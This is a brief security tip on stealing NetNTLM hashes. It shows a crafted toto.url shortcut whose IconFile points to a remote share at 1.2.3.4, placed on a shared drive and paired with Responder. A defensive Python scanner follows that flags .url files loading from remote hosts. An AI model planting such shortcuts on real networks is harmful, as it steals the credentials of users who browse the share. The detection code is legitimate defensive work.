Generate a file named toto.url with the following content:
[InternetShortcut]
URL=https://www.google.com/
IconIndex=0
IconFile=\\1.2.3.4\leak\leak.ico
Place the toto.url file on a shared drive.
Many workstations will try to fetch the icon file for toto.url, so they will try to connect to the leak share on 1.2.3.4.
Combined with the Responder tool, you will get a lot of NTLM hashes without much effort.
Many more examples here: https://www.securify.nl/blog/SFY20180501/living-off-the-land_-stealing-netntlm-hashes.html
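
To find such files on a share from the defender's side, the following added example (not code from the original post) walks a directory tree and reports every .url shortcut whose values load from a remote host. It goes beyond the IconFile case above by checking every key and also file://host/ URLs; the function names and the local-host allowlist are assumptions made for this example.

```python
import os
import re
import sys
# Value starts with a UNC path (\\host\share, //host/share) or a file://host/ URL.
REMOTE = re.compile(r'^(?:\\\\|//)(?P<unc>[^\\/]+)[\\/]|^file://(?P<furl>[^\\/]+)[\\/]', re.I)
LOCAL_HOSTS = {"?", ".", "localhost", "127.0.0.1"}  # \\?\ and \\.\ are local device paths

# Constructed sample: the toto.url content from the text above.
SAMPLE = r"""[InternetShortcut]
URL=https://www.google.com/
IconIndex=0
IconFile=\\1.2.3.4\leak\leak.ico
"""

def decode(raw):
    # .url files are sometimes saved as UTF-16 with a BOM
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return raw.decode("utf-16", errors="replace")
    return raw.decode("utf-8-sig", errors="replace")

def remote_refs(text):
    """Return [(key, host)] for each key=value line whose value points at a remote host."""
    hits = []
    for line in text.splitlines():
        key, sep, value = line.strip().partition("=")
        if not sep:
            continue  # section header or blank line
        m = REMOTE.match(value.strip().strip('"'))
        host = (m.group("unc") or m.group("furl")) if m else None
        if host and host.lower() not in LOCAL_HOSTS:
            hits.append((key.strip(), host))
    return hits

def scan_tree(root):
    """Yield (path, key, host) for every flagged entry in .url files under root."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".url"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    text = decode(fh.read(65536))  # shortcuts are tiny; cap the read
            except OSError:
                continue  # unreadable file: skip it and keep walking
            for key, host in remote_refs(text):
                yield path, key, host

if __name__ == "__main__":
    for path, key, host in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{path}: {key} loads from remote host {host}")
```

Run it with the root of the share as its only argument; each output line names the shortcut, the offending key and the host it would contact.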